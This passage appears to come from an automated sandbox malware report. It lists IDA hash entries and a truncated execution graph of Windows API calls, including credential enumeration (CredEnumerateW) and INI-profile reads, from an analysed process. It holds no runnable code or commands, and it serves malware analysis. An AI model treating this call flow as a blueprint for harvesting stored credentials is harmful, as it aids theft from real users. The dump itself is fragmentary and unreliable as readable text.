                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                    • String ID: *?$.
                                    • API String ID: 2667617558-3972193922
                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                    • Instruction ID: 96522638a0a924022dd0cfe0619f910497d1a781ee5a6b8a12b9804f66f21882
                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                    • Instruction Fuzzy Hash: 1051E379E24249AFCB14DFA8C880AEDBBF9EF48714F2885ADD544E7301E6359A018B50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: : $Se.
                                    • API String ID: 4218353326-4089948878
                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                    • Instruction ID: d473fd1f25d3f8c536e231c681549665ebd40f90712ba99248459a44b097f137
                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                    • Instruction Fuzzy Hash: E9113A71A20388AECB11CFACD840BDDFBFCEF29604F24449AE545E7252E6705B02C764
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 23DC2903
                                      • Part of subcall function 23DC35D2: RaiseException.KERNEL32(?,?,?,23DC2925,00000000,00000000,00000000,?,?,?,?,?,23DC2925,?,23DD21B8), ref: 23DC3632
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 23DC2920
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: 88ca22c1cdbc7971ca933418651ce0b6c913783d0a255a404c0eabd9f93609a6
                                    • Instruction ID: 463f031af6192504aec657a9f7503c97dd0e9a133ea9855fb32d0b602a597ffa
                                    • Opcode Fuzzy Hash: 88ca22c1cdbc7971ca933418651ce0b6c913783d0a255a404c0eabd9f93609a6
                                    • Instruction Fuzzy Hash: 0FF0D13593038C77CF10A6A4EC44B5AB36C6F10E50B9049ECEA6493091EF30EB1985E4

                                    Execution Graph

                                    Execution Coverage:6.2%
                                    Dynamic/Decrypted Code Coverage:9.2%
                                    Signature Coverage:1.5%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:81
                                    execution_graph 40321 441819 40324 430737 40321->40324 40323 441825 40325 430756 40324->40325 40337 43076d 40324->40337 40326 430774 40325->40326 40327 43075f 40325->40327 40338 43034a 40326->40338 40349 4169a7 11 API calls 40327->40349 40330 4307ce 40331 430819 memset 40330->40331 40342 415b2c 40330->40342 40331->40337 40332 43077e 40332->40330 40335 4307fa 40332->40335 40332->40337 40334 4307e9 40334->40331 40334->40337 40350 4169a7 11 API calls 40335->40350 40337->40323 40339 430359 40338->40339 40340 43034e 40338->40340 40339->40332 40351 415c23 memcpy 40340->40351 40343 415b42 40342->40343 40348 415b46 40342->40348 40344 415b94 40343->40344 40346 415b5a 40343->40346 40343->40348 40345 4438b5 10 API calls 40344->40345 40345->40348 40347 415b79 memcpy 40346->40347 40346->40348 40347->40348 40348->40334 40349->40337 40350->40337 40351->40339 37676 442ec6 19 API calls 37850 4152c6 malloc 37851 4152e2 37850->37851 37852 4152ef 37850->37852 37854 416760 11 API calls 37852->37854 37854->37851 37855 4466f4 37874 446904 37855->37874 37857 446700 GetModuleHandleA 37860 446710 __set_app_type __p__fmode __p__commode 37857->37860 37859 4467a4 37861 4467ac __setusermatherr 37859->37861 37862 4467b8 37859->37862 37860->37859 37861->37862 37875 4468f0 _controlfp 37862->37875 37864 4467bd _initterm __wgetmainargs _initterm 37865 44681e GetStartupInfoW 37864->37865 37866 446810 37864->37866 37868 446866 GetModuleHandleA 37865->37868 37876 41276d 37868->37876 37872 446896 exit 37873 44689d _cexit 37872->37873 37873->37866 37874->37857 37875->37864 37877 41277d 37876->37877 37919 4044a4 LoadLibraryW 37877->37919 37879 412785 37911 412789 37879->37911 37927 414b81 37879->37927 37882 4127c8 37933 412465 memset ??2@YAPAXI 37882->37933 37884 4127ea 37945 40ac21 37884->37945 37889 412813 37963 40dd07 memset 37889->37963 37890 412827 37968 40db69 memset 37890->37968 37893 412822 37989 4125b6 ??3@YAXPAX 37893->37989 37895 40ada2 _wcsicmp 37896 41283d 37895->37896 37896->37893 37899 412863 CoInitialize 37896->37899 37973 41268e 37896->37973 37993 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37899->37993 37901 41296f 37995 40b633 37901->37995 37906 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37910 412957 37906->37910 37916 4128ca 37906->37916 37910->37893 37911->37872 37911->37873 37912 4128d0 TranslateAcceleratorW 37913 412941 GetMessageW 37912->37913 37912->37916 37913->37910 37913->37912 37914 412909 IsDialogMessageW 37914->37913 37914->37916 37915 4128fd IsDialogMessageW 37915->37913 37915->37914 37916->37912 37916->37914 37916->37915 37917 41292b TranslateMessage DispatchMessageW 37916->37917 37918 41291f IsDialogMessageW 37916->37918 37917->37913 37918->37913 37918->37917 37920 4044cf GetProcAddress 37919->37920 37923 4044f7 37919->37923 37921 4044e8 FreeLibrary 37920->37921 37924 4044df 37920->37924 37922 4044f3 37921->37922 37921->37923 37922->37923 37925 404507 MessageBoxW 37923->37925 37926 40451e 37923->37926 37924->37921 37925->37879 37926->37879 37928 414b8a 37927->37928 37929 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37927->37929 37999 40a804 memset 37928->37999 37929->37882 37932 414b9e GetProcAddress 37932->37929 37934 4124e0 37933->37934 37935 412505 ??2@YAPAXI 37934->37935 37936 41251c 37935->37936 37938 412521 37935->37938 38021 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37936->38021 38010 444722 37938->38010 37944 41259b wcscpy 37944->37884 38026 40b1ab ??3@YAXPAX ??3@YAXPAX 37945->38026 37949 40ad4b 37958 40ad76 37949->37958 38050 40a9ce 37949->38050 37950 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37952 40ac5c 37950->37952 37952->37949 37952->37950 37953 40ace7 ??3@YAXPAX 37952->37953 37952->37958 38030 40a8d0 37952->38030 38042 4099f4 37952->38042 37953->37952 37957 40a8d0 7 API calls 37957->37958 38027 40aa04 37958->38027 37959 40ada2 37960 40adc9 37959->37960 37961 40adaa 37959->37961 37960->37889 37960->37890 37961->37960 37962 40adb3 _wcsicmp 37961->37962 37962->37960 37962->37961 38055 40dce0 37963->38055 37965 40dd3a GetModuleHandleW 38060 40dba7 37965->38060 37969 40dce0 3 API calls 37968->37969 37970 40db99 37969->37970 38132 40dae1 37970->38132 38146 402f3a 37973->38146 37975 412766 37975->37893 37975->37899 37976 4126d3 _wcsicmp 37977 4126a8 37976->37977 37977->37975 37977->37976 37979 41270a 37977->37979 38180 4125f8 7 API calls 37977->38180 37979->37975 38149 411ac5 37979->38149 37990 4125da 37989->37990 37991 4125f0 37990->37991 37992 4125e6 DeleteObject 37990->37992 37994 40b1ab ??3@YAXPAX ??3@YAXPAX 37991->37994 37992->37991 37993->37906 37994->37901 37996 40b640 37995->37996 37997 40b639 ??3@YAXPAX 37995->37997 37998 40b1ab ??3@YAXPAX ??3@YAXPAX 37996->37998 37997->37996 37998->37911 38000 40a83b GetSystemDirectoryW 37999->38000 38001 40a84c wcscpy 37999->38001 38000->38001 38006 409719 wcslen 38001->38006 38004 40a881 LoadLibraryW 38005 40a886 38004->38005 38005->37929 38005->37932 38007 409724 38006->38007 38008 409739 wcscat LoadLibraryW 38006->38008 38007->38008 38009 40972c wcscat 38007->38009 38008->38004 38008->38005 38009->38008 38011 444732 38010->38011 38012 444728 DeleteObject 38010->38012 38022 409cc3 38011->38022 38012->38011 38014 412551 38015 4010f9 38014->38015 38016 401130 38015->38016 38017 401134 GetModuleHandleW LoadIconW 38016->38017 38018 401107 wcsncat 38016->38018 38019 40a7be 38017->38019 38018->38016 38020 40a7d2 38019->38020 38020->37944 38020->38020 38021->37938 38025 409bfd memset wcscpy 38022->38025 38024 409cdb CreateFontIndirectW 38024->38014 38025->38024 38026->37952 38028 40aa14 38027->38028 38029 40aa0a ??3@YAXPAX 38027->38029 38028->37959 38029->38028 38031 40a8eb 38030->38031 38032 40a8df wcslen 38030->38032 38033 40a906 ??3@YAXPAX 38031->38033 38034 40a90f 38031->38034 38032->38031 38038 40a919 38033->38038 38035 4099f4 3 API calls 38034->38035 38035->38038 38036 40a932 38040 4099f4 3 API calls 38036->38040 38037 40a929 ??3@YAXPAX 38039 40a93e memcpy 38037->38039 38038->38036 38038->38037 38039->37952 38041 40a93d 38040->38041 38041->38039 38043 409a41 38042->38043 38044 4099fb malloc 38042->38044 38043->37952 38046 409a37 38044->38046 38047 409a1c 38044->38047 38046->37952 38048 409a30 ??3@YAXPAX 38047->38048 38049 409a20 memcpy 38047->38049 38048->38046 38049->38048 38051 40a9e7 38050->38051 38052 40a9dc ??3@YAXPAX 38050->38052 38054 4099f4 3 API calls 38051->38054 38053 40a9f2 38052->38053 38053->37957 38054->38053 38079 409bca GetModuleFileNameW 38055->38079 38057 40dce6 wcsrchr 38058 40dcf5 38057->38058 38059 40dcf9 wcscat 38057->38059 38058->38059 38059->37965 38080 44db70 38060->38080 38064 40dbfd 38083 4447d9 38064->38083 38067 40dc34 wcscpy wcscpy 38109 40d6f5 38067->38109 38068 40dc1f wcscpy 38068->38067 38071 40d6f5 3 API calls 38072 40dc73 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc89 38073->38074 38075 40d6f5 3 API calls 38074->38075 38076 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38075->38076 38115 40da80 38076->38115 38079->38057 38081 40dbb4 memset memset 38080->38081 38082 409bca GetModuleFileNameW 38081->38082 38082->38064 38085 4447f4 38083->38085 38084 40dc1b 38084->38067 38084->38068 38085->38084 38086 444807 ??2@YAPAXI 38085->38086 38087 44481f 38086->38087 38088 444873 _snwprintf 38087->38088 38089 4448ab wcscpy 38087->38089 38122 44474a 8 API calls 38088->38122 38091 4448bb 38089->38091 38123 44474a 8 API calls 38091->38123 38093 4448a7 38093->38089 38093->38091 38094 4448cd 38124 44474a 8 API calls 38094->38124 38096 4448e2 38125 44474a 8 API calls 38096->38125 38098 4448f7 38126 44474a 8 API calls 38098->38126 38100 44490c 38127 44474a 8 API calls 38100->38127 38102 444921 38128 44474a 8 API calls 38102->38128 38104 444936 38129 44474a 8 API calls 38104->38129 38106 44494b 38130 44474a 8 API calls 38106->38130 38108 444960 ??3@YAXPAX 38108->38084 38110 44db70 38109->38110 38111 40d702 memset GetPrivateProfileStringW 38110->38111 38112 40d752 38111->38112 38113 40d75c WritePrivateProfileStringW 38111->38113 38112->38113 38114 40d758 38112->38114 38113->38114 38114->38071 38116 44db70 38115->38116 38117 40da8d memset 38116->38117 38118 40daac LoadStringW 38117->38118 38119 40dac6 38118->38119 38119->38118 38121 40dade 38119->38121 38131 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38119->38131 38121->37893 38122->38093 38123->38094 38124->38096 38125->38098 38126->38100 38127->38102 38128->38104 38129->38106 38130->38108 38131->38119 38142 409b98 GetFileAttributesW 38132->38142 38134 40daea 38135 40db63 38134->38135 38136 40daef wcscpy wcscpy GetPrivateProfileIntW 38134->38136 38135->37895 38143 40d65d GetPrivateProfileStringW 38136->38143 38138 40db3e 38144 40d65d GetPrivateProfileStringW 38138->38144 38140 40db4f 38145 40d65d GetPrivateProfileStringW 38140->38145 38142->38134 38143->38138 38144->38140 38145->38135 38181 40eaff 38146->38181 38150 411ae2 memset 38149->38150 38151 411b8f 38149->38151 38221 409bca GetModuleFileNameW 38150->38221 38163 411a8b 38151->38163 38153 411b0a wcsrchr 38154 411b22 wcscat 38153->38154 38155 411b1f 38153->38155 38222 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38154->38222 38155->38154 38157 411b67 38223 402afb 38157->38223 38161 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38161->38279 38164 402afb 27 API calls 38163->38164 38165 411ac0 38164->38165 38166 4110dc 38165->38166 38167 41113e 38166->38167 38172 4110f0 38166->38172 38304 40969c LoadCursorW SetCursor 38167->38304 38169 411143 38305 4032b4 38169->38305 38323 444a54 38169->38323 38170 4110f7 _wcsicmp 38170->38172 38171 411157 38173 40ada2 _wcsicmp 38171->38173 38172->38167 38172->38170 38326 410c46 10 API calls 38172->38326 38176 411167 38173->38176 38174 4111af 38176->38174 38177 4111a6 qsort 38176->38177 38177->38174 38180->37977 38182 40eb10 38181->38182 38194 40e8e0 38182->38194 38185 40eb6c memcpy memcpy 38186 40ebb7 38185->38186 38186->38185 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38186->38187 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38191 40ec65 38187->38191 38188->38186 38189->38191 38191->38191 38204 40ea7f 38191->38204 38193 402f49 38193->37977 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e911 38197->38199 38200 40e90a ??3@YAXPAX 38197->38200 38198->38197 38201 40e931 ??2@YAPAXI ??2@YAPAXI 38199->38201 38202 40e921 ??3@YAXPAX 38199->38202 38203 40e92a ??3@YAXPAX 38199->38203 38200->38199 38201->38185 38202->38203 38203->38201 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea88 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea90 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea98 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38153 38222->38157 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38161 38279->38151 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38287 40b5e7 38284->38287 38285->38282 38286->38287 38288 40b5d0 SizeofResource LockResource 38286->38288 38287->38285 38296 40afcf 38287->38296 38288->38287 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38169 38306 4032c4 38305->38306 38307 40b633 ??3@YAXPAX 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38523 40368c 15 API calls 38312->38523 38314 403489 38315 40b633 ??3@YAXPAX 38314->38315 38316 403495 38315->38316 38316->38171 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38521 4028e7 11 API calls 38319->38521 38522 40f508 6 API calls 38319->38522 38321 403421 _wcsicmp 38321->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38171 38326->38172 38328 445548 38327->38328 38329 445599 38328->38329 38524 40c768 38328->38524 38330 4455a8 memset 38329->38330 38336 4457f2 38329->38336 38607 403988 38330->38607 38339 445854 38336->38339 38709 403e2d memset memset memset memset memset 38336->38709 38390 4458aa 38339->38390 38732 403c9c memset memset memset memset memset 38339->38732 38340 445672 38618 403fbe memset memset memset memset memset 38340->38618 38341 4458bb memset memset 38343 414c2e 16 API calls 38341->38343 38342 4455e5 38342->38340 38352 44560f 38342->38352 38346 4458f9 38343->38346 38345 44595e memset memset 38350 414c2e 16 API calls 38345->38350 38351 40b2cc 27 API calls 38346->38351 38348 445a00 memset memset 38755 414c2e 38348->38755 38349 445b22 38355 445bca 38349->38355 38356 445b38 memset memset memset 38349->38356 38360 44599c 38350->38360 38361 445909 38351->38361 38363 4087b3 338 API calls 38352->38363 38353 44557a 38387 44558c 38353->38387 38804 41366b FreeLibrary 38353->38804 38354 445849 38819 40b1ab ??3@YAXPAX ??3@YAXPAX 38354->38819 38362 445c8b memset memset 38355->38362 38429 445cf0 38355->38429 38365 445bd4 38356->38365 38366 445b98 38356->38366 38369 40b2cc 27 API calls 38360->38369 38371 409d1f 6 API calls 38361->38371 38374 414c2e 16 API calls 38362->38374 38372 445621 38363->38372 38364 44589f 38820 40b1ab ??3@YAXPAX ??3@YAXPAX 38364->38820 38380 414c2e 16 API calls 38365->38380 38366->38365 38376 445ba2 38366->38376 38373 4459ac 38369->38373 38370 403335 38520 4452e5 45 API calls 38370->38520 38383 445919 38371->38383 38805 4454bf 20 API calls 38372->38805 38385 409d1f 6 API calls 38373->38385 38386 445cc9 38374->38386 38892 4099c6 wcslen 38376->38892 38377 4456b2 38807 40b1ab ??3@YAXPAX ??3@YAXPAX 38377->38807 38379 40b2cc 27 API calls 38391 445a4f 38379->38391 38393 445be2 38380->38393 38381 445d3d 38414 40b2cc 27 API calls 38381->38414 38382 445d88 memset memset memset 38397 414c2e 16 API calls 38382->38397 38821 409b98 GetFileAttributesW 38383->38821 38384 445823 38384->38354 38396 4087b3 338 API calls 38384->38396 38398 4459bc 38385->38398 38399 409d1f 6 API calls 38386->38399 38591 444b06 38387->38591 38388 445879 38388->38364 38409 4087b3 338 API calls 38388->38409 38390->38341 38415 44594a 38390->38415 38770 409d1f wcslen wcslen 38391->38770 38394 40b2cc 27 API calls 38393->38394 38403 445bf3 38394->38403 38396->38384 38406 445dde 38397->38406 38888 409b98 GetFileAttributesW 38398->38888 38408 445ce1 38399->38408 38400 445bb3 38895 445403 memset 38400->38895 38401 445680 38401->38377 38641 4087b3 memset 38401->38641 38413 409d1f 6 API calls 38403->38413 38404 445928 38404->38415 38822 40b6ef 38404->38822 38416 40b2cc 27 API calls 38406->38416 38912 409b98 GetFileAttributesW 38408->38912 38409->38388 38412 40b2cc 27 API calls 38421 445a94 38412->38421 38423 445c07 38413->38423 38424 445d54 _wcsicmp 38414->38424 38415->38345 38428 4459ed 38415->38428 38427 445def 38416->38427 38417 4459cb 38417->38428 38437 40b6ef 252 API calls 38417->38437 38775 40ae18 38421->38775 38422 44566d 38422->38336 38692 413d4c 38422->38692 38433 445389 258 API calls 38423->38433 38434 445d71 38424->38434 38499 445d67 38424->38499 38426 445665 38806 40b1ab ??3@YAXPAX ??3@YAXPAX 38426->38806 38435 409d1f 6 API calls 38427->38435 38428->38348 38428->38349 38429->38370 38429->38381 38429->38382 38430 445389 258 API calls 38430->38355 38439 445c17 38433->38439 38913 445093 23 API calls 38434->38913 38442 445e03 38435->38442 38437->38428 38438 4456d8 38444 40b2cc 27 API calls 38438->38444 38445 40b2cc 27 API calls 38439->38445 38441 44563c 38441->38426 38447 4087b3 338 API calls 38441->38447 38914 409b98 GetFileAttributesW 38442->38914 38443 40b6ef 252 API calls 38443->38370 38449 4456e2 38444->38449 38450 445c23 38445->38450 38446 445d83 38446->38370 38447->38441 38808 413fa6 _wcsicmp _wcsicmp 38449->38808 38454 409d1f 6 API calls 38450->38454 38452 445e12 38459 445e6b 38452->38459 38465 40b2cc 27 API calls 38452->38465 38457 445c37 38454->38457 38455 445aa1 38458 445b17 38455->38458 38473 445ab2 memset 38455->38473 38486 409d1f 6 API calls 38455->38486 38782 40add4 38455->38782 38787 445389 38455->38787 38796 40ae51 38455->38796 38456 4456eb 38461 4456fd memset memset memset memset 38456->38461 38462 4457ea 38456->38462 38463 445389 258 API calls 38457->38463 38889 40aebe 38458->38889 38916 445093 23 API calls 38459->38916 38809 409c70 wcscpy wcsrchr 38461->38809 38812 413d29 38462->38812 38469 445c47 38463->38469 38470 445e33 38465->38470 38467 445e7e 38472 445f67 38467->38472 38475 40b2cc 27 API calls 38469->38475 38476 409d1f 6 API calls 38470->38476 38481 40b2cc 27 API calls 38472->38481 38477 40b2cc 27 API calls 38473->38477 38479 445c53 38475->38479 38480 445e47 38476->38480 38477->38455 38478 409c70 2 API calls 38482 44577e 38478->38482 38483 409d1f 6 API calls 38479->38483 38915 409b98 GetFileAttributesW 38480->38915 38485 445f73 38481->38485 38487 409c70 2 API calls 38482->38487 38488 445c67 38483->38488 38490 409d1f 6 API calls 38485->38490 38486->38455 38491 44578d 38487->38491 38492 445389 258 API calls 38488->38492 38489 445e56 38489->38459 38495 445e83 memset 38489->38495 38493 445f87 38490->38493 38491->38462 38498 40b2cc 27 API calls 38491->38498 38492->38355 38919 409b98 GetFileAttributesW 38493->38919 38497 40b2cc 27 API calls 38495->38497 38500 445eab 38497->38500 38501 4457a8 38498->38501 38499->38370 38499->38443 38502 409d1f 6 API calls 38500->38502 38503 409d1f 6 API calls 38501->38503 38504 445ebf 38502->38504 38505 4457b8 38503->38505 38506 40ae18 9 API calls 38504->38506 38811 409b98 GetFileAttributesW 38505->38811 38516 445ef5 38506->38516 38508 4457c7 38508->38462 38510 4087b3 338 API calls 38508->38510 38509 40ae51 9 API calls 38509->38516 38510->38462 38511 445f5c 38513 40aebe FindClose 38511->38513 38512 40add4 2 API calls 38512->38516 38513->38472 38514 40b2cc 27 API calls 38514->38516 38515 409d1f 6 API calls 38515->38516 38516->38509 38516->38511 38516->38512 38516->38514 38516->38515 38518 445f3a 38516->38518 38917 409b98 GetFileAttributesW 38516->38917 38918 445093 23 API calls 38518->38918 38520->38319 38521->38321 38522->38319 38523->38314 38525 40c775 38524->38525 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38525->38920 38527 40c788 38921 40b1ab ??3@YAXPAX ??3@YAXPAX 38527->38921 38529 40c790 38922 40b1ab ??3@YAXPAX ??3@YAXPAX 38529->38922 38531 40c798 38532 40aa04 ??3@YAXPAX 38531->38532 38533 40c7a0 38532->38533 38923 40c274 memset 38533->38923 38538 40a8ab 9 API calls 38539 40c7c3 38538->38539 38540 40a8ab 9 API calls 38539->38540 38541 40c7d0 38540->38541 38952 40c3c3 38541->38952 38545 40c7e5 38546 40c877 38545->38546 38547 40c86c 38545->38547 38553 40c634 49 API calls 38545->38553 38977 40a706 38545->38977 38554 40bdb0 38546->38554 38994 4053fe 39 API calls 38547->38994 38553->38545 39162 404363 38554->39162 38557 40bf5d 39182 40440c 38557->39182 38559 40bdee 38559->38557 38562 40b2cc 27 API calls 38559->38562 38560 40bddf CredEnumerateW 38560->38559 38563 40be02 wcslen 38562->38563 38563->38557 38565 40be1e 38563->38565 38564 40be26 _wcsncoll 38564->38565 38565->38557 38565->38564 38568 40be7d memset 38565->38568 38569 40bea7 memcpy 38565->38569 38570 40bf11 wcschr 38565->38570 38571 40b2cc 27 API calls 38565->38571 38573 40bf43 LocalFree 38565->38573 39185 40bd5d 28 API calls 38565->39185 39186 404423 38565->39186 38568->38565 38568->38569 38569->38565 38569->38570 38570->38565 38572 40bef6 _wcsnicmp 38571->38572 38572->38565 38572->38570 38573->38565 38574 4135f7 39199 4135e0 38574->39199 38577 40b2cc 27 API calls 38578 41360d 38577->38578 38579 40a804 8 API calls 38578->38579 38580 413613 38579->38580 38581 41361b 38580->38581 38582 41363e 38580->38582 38583 40b273 27 API calls 38581->38583 38584 4135e0 FreeLibrary 38582->38584 38585 413625 GetProcAddress 38583->38585 38586 413643 38584->38586 38585->38582 38587 413648 38585->38587 38586->38353 38588 413658 38587->38588 38589 4135e0 FreeLibrary 38587->38589 38588->38353 38590 413666 38589->38590 38590->38353 39202 4449b9 38591->39202 38594 444c1f 38594->38329 38595 4449b9 42 API calls 38597 444b4b 38595->38597 38596 444c15 38599 4449b9 42 API calls 38596->38599 38597->38596 39223 444972 GetVersionExW 38597->39223 38599->38594 38600 444b99 memcmp 38605 444b8c 38600->38605 38601 444c0b 39227 444a85 42 API calls 38601->39227 38605->38600 38605->38601 39224 444aa5 42 API calls 38605->39224 39225 40a7a0 GetVersionExW 38605->39225 39226 444a85 42 API calls 38605->39226 38608 40399d 38607->38608 39228 403a16 38608->39228 38610 403a09 39242 40b1ab ??3@YAXPAX ??3@YAXPAX 38610->39242 38612 403a12 wcsrchr 38612->38342 38613 4039a3 38613->38610 38616 4039f4 38613->38616 39239 40a02c CreateFileW 38613->39239 38616->38610 38617 4099c6 2 API calls 38616->38617 38617->38610 38619 414c2e 16 API calls 38618->38619 38620 404048 38619->38620 38621 414c2e 16 API calls 38620->38621 38622 404056 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 404073 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 40408e 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 4040a6 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040ba 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040cb 38631->38632 39269 40414f memset 38632->39269 38634 404140 39283 40b1ab ??3@YAXPAX ??3@YAXPAX 38634->39283 38636 4040ec memset 38639 4040e0 38636->38639 38637 404148 38637->38401 38638 4099c6 2 API calls 38638->38639 38639->38634 38639->38636 38639->38638 38640 40a8ab 9 API calls 38639->38640 38640->38639 39296 40a6e6 WideCharToMultiByte 38641->39296 38643 4087ed 39297 4095d9 memset 38643->39297 38646 408953 38646->38401 38647 408809 memset memset memset memset memset 38648 40b2cc 27 API calls 38647->38648 38649 4088a1 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088b1 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088c0 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088d0 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088df 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 4088ef 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 4088fe 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40890e 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 40891d 38664->38665 38666 409d1f 6 API calls 38665->38666 38667 40892d 38666->38667 39316 409b98 GetFileAttributesW 38667->39316 38669 40893e 38670 408943 38669->38670 38671 408958 38669->38671 39317 407fdf 75 API calls 38670->39317 39318 409b98 GetFileAttributesW 38671->39318 38674 408964 38675 408969 38674->38675 38676 40897b 38674->38676 39319 4082c7 199 API 